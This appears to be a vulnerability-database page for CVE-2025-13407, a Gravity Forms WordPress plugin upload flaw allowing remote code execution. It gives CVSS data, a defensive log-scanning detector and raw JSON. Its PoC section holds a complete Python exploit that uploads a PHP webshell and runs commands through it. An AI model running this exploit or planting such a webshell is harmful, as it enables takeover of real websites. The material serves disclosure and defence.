Security Vulnerability Report
CVE-2025-13407 CVSS 6.8 MEDIUM

CVE-2025-13407

Published: 2025-12-24 06:15:44
Last Modified: 2026-04-15 00:35:42

Description

The Gravity Forms WordPress plugin before 2.9.23.1 does not properly prevent users from uploading dangerous files through its chunked upload functionality, allowing attackers to upload PHP files to affected sites and achieve Remote Code Execution, granted they can discover or enumerate the upload path.
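Added detection example, not code from the advisory or from the Gravity Forms project: it scans web-server access-log lines for requests to executable file types under the upload directory named in this report, which is the trace a successful abuse of this flaw leaves behind. The log lines, client addresses and the form subdirectory name are constructed for the example.

```python
import re

# Upload directory from the report; extensions PHP-capable servers may execute.
UPLOAD_DIR = "/wp-content/uploads/gravity_forms/"
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar|phps)(\?|$)", re.IGNORECASE)

# Apache/nginx "combined" access-log format (only the fields we need).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one served .php hit, one benign PDF, one blocked .phtml.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Dec/2025:06:20:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 187
203.0.113.5 - - [24/Dec/2025:06:20:03 +0000] "GET /wp-content/uploads/gravity_forms/1-abc/shell.php?cmd=id HTTP/1.1" 200 43
198.51.100.7 - - [24/Dec/2025:06:21:10 +0000] "GET /wp-content/uploads/gravity_forms/1-abc/resume.pdf HTTP/1.1" 200 52310
203.0.113.9 - - [24/Dec/2025:06:22:00 +0000] "GET /wp-content/uploads/gravity_forms/1-abc/x.phtml HTTP/1.1" 403 199
"""


def suspicious_upload_requests(log_text: str) -> list[dict]:
    """Return one alert per request for an executable file in the upload dir.

    A 2xx response means the server actually served (and likely executed) the
    file, so those are rated high; a blocked request still shows intent.
    """
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        path = m.group("path")
        if UPLOAD_DIR not in path or not EXEC_EXT.search(path):
            continue
        served = m.group("status").startswith("2")
        alerts.append({
            "ip": m.group("ip"),
            "path": path,
            "status": int(m.group("status")),
            "severity": "high" if served else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in suspicious_upload_requests(SAMPLE_LOG):
        print(alert)
```

A high-severity hit here is also a sign that the web server executes PHP from the uploads tree, which is the condition to remove regardless of plugin version.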

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Gravity Forms WordPress Plugin < 2.9.23.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-13407 PoC - Gravity Forms Arbitrary File Upload to RCE
# Target: WordPress site with vulnerable Gravity Forms plugin < 2.9.23.1

TARGET = "http://target-wordpress-site.com"
USERNAME = "attacker"
PASSWORD = "password"
UPLOAD_PATH = "/wp-content/uploads/gravity_forms/"


def get_auth_token():
    """Login to WordPress and get authentication cookie"""
    login_url = f"{TARGET}/wp-login.php"
    session = requests.Session()
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In'
    }
    response = session.post(login_url, data=login_data)
    if 'wordpress_logged_in' in str(response.cookies):
        return session
    return None


def upload_php_shell(session):
    """Upload malicious PHP file via Gravity Forms chunked upload"""
    upload_url = f"{TARGET}/wp-admin/admin-ajax.php"
    # PHP webshell content
    php_shell = b'<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'
    files = {
        'file': ('shell.php', php_shell, 'application/x-php'),
        'action': 'gf_chunked_upload',
        'form_id': '1'
    }
    response = session.post(upload_url, files=files)
    return response.json()


def main():
    print("[*] CVE-2025-13407 PoC - Gravity Forms File Upload to RCE")

    # Step 1: Authenticate
    print("[*] Authenticating as low-privilege user...")
    session = get_auth_token()
    if not session:
        print("[-] Authentication failed")
        return
    print("[+] Authenticated successfully")

    # Step 2: Upload PHP shell
    print("[*] Uploading PHP shell...")
    result = upload_php_shell(session)
    if 'url' in result:
        shell_url = result['url']
        print(f"[+] Shell uploaded: {shell_url}")

        # Step 3: Execute RCE
        print("[*] Testing RCE...")
        rce_test = session.get(f"{shell_url}?cmd=whoami")
        if rce_test.status_code == 200:
            print(f"[+] RCE Successful! Output: {rce_test.text.strip()}")
    else:
        print("[-] Upload failed")


if __name__ == "__main__":
    main()

References

https://wpscan.com/vulnerability/e09908fb-f5ad-45ca-8698-c0d596fd39cc/

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13407",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-24T06:15:43.973",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Gravity Forms WordPress plugin before 2.9.23.1 does not properly prevent users from uploading dangerous files through its chunked upload functionality, allowing attackers to upload PHP files to affected sites and achieve Remote Code Execution, granted they can discover or enumerate the upload path."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.2
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/e09908fb-f5ad-45ca-8698-c0d596fd39cc/",
        "source": "[email protected]"
      }
    ]
  }
}